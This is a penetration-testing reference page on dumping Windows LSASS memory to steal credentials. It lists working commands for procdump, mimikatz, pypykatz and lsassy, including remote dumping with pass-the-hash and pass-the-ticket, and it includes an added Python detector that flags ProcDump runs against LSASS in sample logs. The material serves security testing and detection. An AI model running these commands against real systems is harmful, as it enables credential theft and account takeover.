# LSASS secrets

## Overview

In Windows, the Local Security Authority Subsystem Service (LSASS) enforces security on the system. LSASS handles tasks such as password changes and logins, which means that credentials and hashes are held in the memory of the LSASS process. With administrative rights, these credentials and hashes can be extracted.

## Local Dumping

**Locally Dumping LSASS**

ProcDump is a Windows tool from the Sysinternals package that can be used to dump the process memory of LSASS. Because it is a Windows tool, this may look like a more legitimate method of dumping LSASS than bringing other, unsigned attack tools onto the host.

* <https://learn.microsoft.com/en-us/sysinternals/downloads/procdump>

The following command will dump the LSASS memory to a .dmp file:

`procdump.exe -accepteula -ma lsass.exe lsass.dmp`
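From the defender's side, this command line is visible in process-creation logging. The following is an added example, not part of the original page or of any tool it links: a small detector run over constructed sample events, assuming Sysmon-style field names (`Image`, `OriginalFileName`, `CommandLine`, `Computer`, `User`); the function names are hypothetical.

```python
import ntpath
import re

PROCDUMP_IMAGES = {"procdump.exe", "procdump64.exe", "procdump64a.exe"}

def tokens(command_line):
    """Split a Windows command line, keeping quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]

def classify(event):
    """Return a finding for a ProcDump run that targets LSASS, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    # Check the embedded original name too, so a renamed copy still matches.
    if image not in PROCDUMP_IMAGES and not original.startswith("procdump"):
        return None
    args = [t.lower() for t in tokens(event.get("CommandLine", ""))[1:]]
    # Require lsass as its own argument; a substring test would also hit
    # output paths. Targets given as a PID are not resolved here.
    if not any(ntpath.basename(a) in ("lsass", "lsass.exe") for a in args):
        return None
    full = any(a in ("-ma", "/ma") for a in args)  # -ma = full memory dump
    return {"host": event.get("Computer"), "user": event.get("User"),
            "severity": "high" if full else "medium",
            "command_line": event["CommandLine"]}

def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in map(classify, events) if f]

# Constructed sample events; hosts, users and paths are made up.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "User": "LAB\\admin", "Image": r"C:\Tools\procdump.exe",
     "OriginalFileName": "procdump",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"Computer": "WS02", "User": "LAB\\admin", "Image": r"C:\Users\Public\dbg.exe",
     "OriginalFileName": "procdump",
     "CommandLine": r"dbg.exe -accepteula lsass.exe C:\Temp\out.dmp"},
    {"Computer": "WEB01", "User": "LAB\\ops", "Image": r"C:\Tools\procdump64.exe",
     "OriginalFileName": "procdump",
     "CommandLine": r'procdump64.exe -ma w3wp.exe "C:\Dumps\w3wp lsass test.dmp"'},
    {"Computer": "WS03", "User": "LAB\\user", "Image": r"C:\Windows\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe lsass.txt"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
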

**Credential Extraction**

Once the lsass.dmp file has been obtained and exfiltrated to an attack machine, Mimikatz or pypykatz can be used offline to extract the data.

* <https://github.com/gentilkiwi/mimikatz>
* <https://github.com/skelsec/pypykatz>

After opening **mimikatz** on the attack machine, the following commands should be used:

`sekurlsa::minidump "lsass.dmp"`

`sekurlsa::logonpasswords`

After opening **pypykatz** on the attack machine, the following command should be used:

`pypykatz lsa minidump lsass.dmp`

## Remotely Dumping (With Credentials)

LSASS can be dumped **remotely** using lsassy, with local administrator credentials. lsassy is a project that ties together two other well-known tools, impacket and pypykatz, to gain the data stored in LSASS.

* <https://github.com/login-securite/lsassy>

**Dump LSASS credentials with plaintext credentials**

`lsassy -d <domain> -u <user> -p <password> <target>`

**Dump LSASS credentials with pass-the-hash (NTLM)**

`lsassy -u <user> -H <NThash> <target>`

**Dump LSASS credentials with pass-the-ticket (Kerberos)**

* Requires an environment variable to be set, see [here](https://github.com/login-securite/lsassy/blob/master/Lsassy-Advanced-Usage#kerberos)

`lsassy -k <target>`

